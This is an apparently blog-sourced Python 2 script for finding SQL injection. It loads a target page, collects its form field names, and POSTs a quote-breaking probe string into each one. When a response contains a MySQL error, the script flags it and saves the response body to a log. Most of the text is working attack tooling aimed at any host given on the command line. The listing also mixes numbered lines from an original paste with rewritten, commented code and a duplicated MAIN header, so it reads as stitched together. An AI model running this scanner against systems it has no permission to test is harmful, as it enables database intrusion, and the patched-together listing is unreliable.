webscan module - sqli module

  1. #!/usr/bin/env python
  2.  
  3. # try_POST_sqli.py
  4. #
  5. # first we will GET argv[1]/page.argv[2] to read it
  6. # and find out what names/inputs/submits/etc... there are.
  7. # next we will POST those param-names separately, one per request, with 'payload'.
  8. #
  9. # more @ http://hauntit.blogspot.com
  10. # enjoy.
  11.  
  12. import urllib
  13. import urllib2
  14. import re
  15. import sys
  16. import httplib
  17.  
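# --- configuration from the command line --------------------------------
# usage: try_POST_sqli.py <host> </path/to/file.php>
# Check the argument count *before* reading sys.argv[1]/[2]: the original
# indexed them first and only validated the count further down, so running
# the script with no arguments died with IndexError instead of the usage line.
if len(sys.argv) < 3:
    sys.stderr.write('usage: ' + sys.argv[0] + ' localhost /path/2file.php\n')
    sys.exit(1)

host = sys.argv[1]        # bare hostname or IP, no scheme
path_file = sys.argv[2]   # path of the page under test
if not path_file.startswith('/'):
    path_file = '/' + path_file   # httplib wants an absolute request path
url = host + ':80'        # NOTE: plain HTTP on port 80 only; no TLS, no other ports

url_file = url + path_file

# Probe string: an unbalanced quote plus noise, meant to break a naively
# concatenated SQL statement so the DBMS error text leaks into the response.
payload = '\';]SQLI?^&*(O:UI:Y@:>T^#/**'

print('Target: %s' % host)
print('Vuln file: %s' % path_file)
print('Full URL to attack: %s' % url_file)
print('')

# First GET the page so we can harvest the form field names to POST to.
# NOTE: urllib.urlopen follows redirects, so the body (and the names pulled
# from it) may actually come from a different URL or host than the target.
get_connect = urllib.urlopen('http://' + url_file)
try:
    get_response = get_connect.read()
    status = get_connect.getcode()
finally:
    get_connect.close()   # release the socket; the original never closed it

print('Status of requested page: %s' % status)

# Form field names, single- or double-quoted (the original only matched
# double quotes).  Duplicates -- the same field name in several forms -- are
# dropped so every name is POSTed exactly once, in first-seen order.
results = []
for _name in re.findall(r'''\sname=["']([^"']+)["']''', get_response):
    if _name not in results:
        results.append(_name)

# Log file collecting every response body in which the SQL error marker
# showed up.  Opened at module level because do_post_now() writes to it; the
# main section is responsible for closing it.  It is created in the current
# working directory and truncated on every run.
poc = open('log_file_with_sql_output.txt', 'w')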
  47.  
  48. #############################################################
  49.  
  50. # func to send POST to target url+found parameter
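def do_post_now(url, param=None):
    """POST the probe payload to ``path_file`` on ``url`` in one form field.

    Args:
        url: ``host:port`` string handed to ``httplib.HTTPConnection``.
        param: form field name that receives the payload.  Defaults to
            ``results[i]``, i.e. the global loop index maintained by the
            main section, so the existing one-argument call keeps working.

    Returns:
        ``True`` when the response body contains the ``'MySQL'`` marker (the
        body is then appended to the module-level ``poc`` log), else
        ``False``.  The original returned nothing; callers that ignore the
        value are unaffected.

    Notes:
        Detection is a crude error-based heuristic: it fires only when the
        server echoes a MySQL error string, so blind or silently handled
        injections are missed, and any page that legitimately mentions
        "MySQL" is a false positive.  Treat a hit as a lead, not a proof.
    """
    if param is None:
        param = results[i]
    params = urllib.urlencode({param: payload})
    headers = {'Content-type': 'application/x-www-form-urlencoded',
               'Accept': 'text/plain'}
    connect = httplib.HTTPConnection(url)
    try:
        connect.request('POST', path_file, params, headers)
        response = connect.getresponse()
        print('%s %s' % (response.status, response.reason))  # 200 OK?
        data = response.read()
    finally:
        connect.close()  # always release the socket, even if the request failed

    offset = data.find('MySQL')
    if offset == -1:
        return False

    # str.find() returns a character offset, not a line; the original printed
    # the offset as "line", and then printed data[0] (the first character of
    # the body) which carried no information.
    line_no = data.count('\n', 0, offset) + 1
    print('\t[+- (  POST SQLI alert!  ) -+]')
    print('\t [+] Found sqli marker in line %d (offset %d), param: %s'
          % (line_no, offset, param))
    # writelines() on a str wrote it char by char and printed None; write the
    # body once, prefixed by which field triggered it so the log is usable.
    poc.write('=== %s%s param=%s ===\n' % (url, path_file, param))
    poc.write(data)
    poc.write('\n')
    poc.flush()  # the handle is closed elsewhere; don't lose this on a crash
    return True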
  69.    
  70. # end of do_post_now(url)
  71. # ---
  72.  
  73. # MAIN:
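# MAIN:
# The script needs two arguments (host and path), i.e. len(sys.argv) >= 3;
# the original tested ``< 2``, which let a one-argument run slip past.
if len(sys.argv) < 3:
    sys.stderr.write('usage: ' + sys.argv[0] + ' localhost /path/2file.php\n')
    sys.exit(1)

try:
    if not results:
        # The original printed nothing at all in this case.
        print('No form field names found in the fetched page; nothing to POST.')
    else:
        print('-------------------------------------------------------------')
        print('Got some results :) Now we can try to exploit parameters.\n')

        # ``i`` must stay a module-level name: do_post_now() reads the global
        # ``i`` to select ``results[i]``, and a for-loop at top level rebinds
        # it each iteration exactly as the old manual counter did.
        for i, param in enumerate(results):
            print('Found param called: %s' % param)
            print('Do POST now, for URL: %s with param: %s' % (url, param))
            do_post_now(url)
            # end of this POST for this parameter
finally:
    # The p0c log is opened at module level and was never closed before;
    # close it here so buffered output reaches disk even if a POST raises.
    poc.close()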